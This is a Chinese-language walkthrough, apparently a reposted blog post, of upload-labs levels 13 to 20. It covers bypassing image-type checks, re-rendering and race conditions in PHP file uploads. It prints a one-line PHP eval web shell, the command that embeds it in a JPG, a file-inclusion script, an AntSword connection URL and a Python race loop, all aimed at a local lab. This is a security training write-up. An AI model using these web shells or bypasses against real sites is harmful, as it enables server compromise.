upload-labs第13关~20关详细解析
【第十三关】图片马
Ⅰ 源码分析
$file = fopen($filename, "rb"); $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); $typeCode = intval($strInfo['chars1'].$strInfo['chars2']); $fileType = ''; switch($typeCode){ case 255216: $fileType = 'jpg'; break; case 13780: $fileType = 'png'; break; case 7173: $fileType = 'gif'; break; default: $fileType = 'unknown'; } return $fileType;}Ⅱ 绕过原理
利用装有一句话木马的jpg照片,绕过后台的文件验证
图片马原理
根据下图,图片马上传后需要一个解析图片的php程序,在这里我们用到include.php
header("Content-Type:text/html;charset=utf-8");$file = $_GET['file'];if(isset($file)){ include $file;}else{ show_source(__file__);}?>
在这里需要准备一些文件
一张jpg格式照片
php文件
phpinfo(); @eval($_POST['a']);?>生成图片马 ,win10环境
copy /b shell.jpg+one.php=1.png一个自带的文件包含脚本php(upload靶场自带include.php)1
Ⅲ 绕过过程
上传文件后,查看图片地址是否可以浏览
利用include.php 解析下图片jpg,可以发现存在phpinfo
现在就是怎么用AntSword去连接图片马
构建下蚁剑playload
http://127.0.0.1/upload-labs/include.php?file=upload/upload-20.jpg
便可以连接,查看数据
https://blog.csdn.net/qq_42311391/article/details/89477993
【第十四关】getimagesize()绕过
$types = '.jpeg|.png|.gif'; if(file_exists($filename)){ $info = getimagesize($filename); $ext = image_type_to_extension($info[2]); if(stripos($types,$ext)>=0){ return $ext; }else{ return false; } }else{ return false; }}与第十三关不同之处在哪里?
判断文件是否在白名单内的做法不同
getimagesize是获取图片的大小,如果头文件不是图片会报错
image_type_to_extension函数:取得图像类型的文件后缀
上传后的jpg会转成jpeg
连接成功
【第十五关】突破exif_imagetype()
未解决
function isImage($filename){ //需要开启php_exif模块 $image_type = exif_imagetype($filename); switch ($image_type) { case IMAGETYPE_GIF: return "gif"; break; case IMAGETYPE_JPEG: return "jpg"; break; case IMAGETYPE_PNG: return "png"; break; default: return false; break; }}为什么要开启php_exif模块?
exif_imagetype函数的作用是什么?
直接按照十四关的图片马上传,可以吗?
不行,直接被拦截了,这里会显示一片空白
开启
【第十六关】二次渲染(未成功)
if(move_uploaded_file($tmpname,$target_path)){ //使用上传的图片生成新的图片 $im = imagecreatefromjpeg($target_path); if($im == false){ $msg = "该文件不是jpg格式的图片!"; @unlink($target_path); }else{ //给新图片指定文件名 srand(time()); $newfilename = strval(rand()).".jpg"; //显示二次渲染后的图片(使用用户上传图片生成的新图片) $img_path = UPLOAD_PATH.'/'.$newfilename; imagejpeg($im,$img_path); @unlink($target_path); $is_upload = true; } } else { $msg = "上传出错!"; }- imagecreatefromjpeg: 由文件或 URL 创建一个新图象
- @unlink:删除文件
- imagejpeg:以jpeg格式将图像输出
源码上讲了哪些东西?
- 我们上传一个含有一句话木马的jpg后,后台会根据这个jpg文件,重新一个jpeg
- 并删除原本的文件
- 最后移动生成的文件到对于目录里
这一关与前面几关不同在哪里?二次渲染具体表现在哪里?
二次渲染是这一关的最大特点,将上传的文件重新生成为新的文件,这很容易出现“图片马被打乱,重新生成一张普通的jpg文件”
上传前的图片马
上传后的图片马,一句话木马被消除了
有一种办法,在图片马文件中间添加一句话木马,但又不破坏文件
随便位置加入一句话,不行
试了好多次,都没成功
后面了解到了,直接将php代码段插入到一个图片里,对于jpg不太显示,jpg不稳定
【第十七关】条件竞争
Burp
AntSword
源码解析
原来上传的文件早在渲染前就上传成功了,只不过渲染成功or失败后,源文件会被删除掉。
渗透准备
四个文件:一句话木马php文件+一张jgp格式照片+包含一句话木马的jpg照片shell_jpg+.py文件
一句话木马php文件
phpinfo(); @eval($_POST['a']);?>包含一句话木马的jpg照片shell_jpg
copy shell.php /b+ shell.jpg = 1.jpg
jpg_payload .py文件
import requestsurl1 = "http://127.0.0.1/include.php?file=./upload/1.jpg"while True: # 定义死循环 html = requests.get(url1)开始渗透
开启jpg_payload .py脚本
python "jpg_payload .py"上传文件,burp抓包
在Repeater上放包,并查看下后台文件
AntSword连接jpg文件,成效
后面,我尝试直接用图片马上传,发现没有二次渲染~~ ,直接用AntSword连接图片马,成功了
【第十八~二十关】
我发现用普通的图片马+自带的文件包含,就可以实现文件上传漏洞
参考下第十三关
参考链接:http://cn-sec.com/archives/1009470.html
https://blog.csdn.net/qwe304/article/details/125725280
来源地址:https://blog.csdn.net/weixin_47126666/article/details/129007457
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
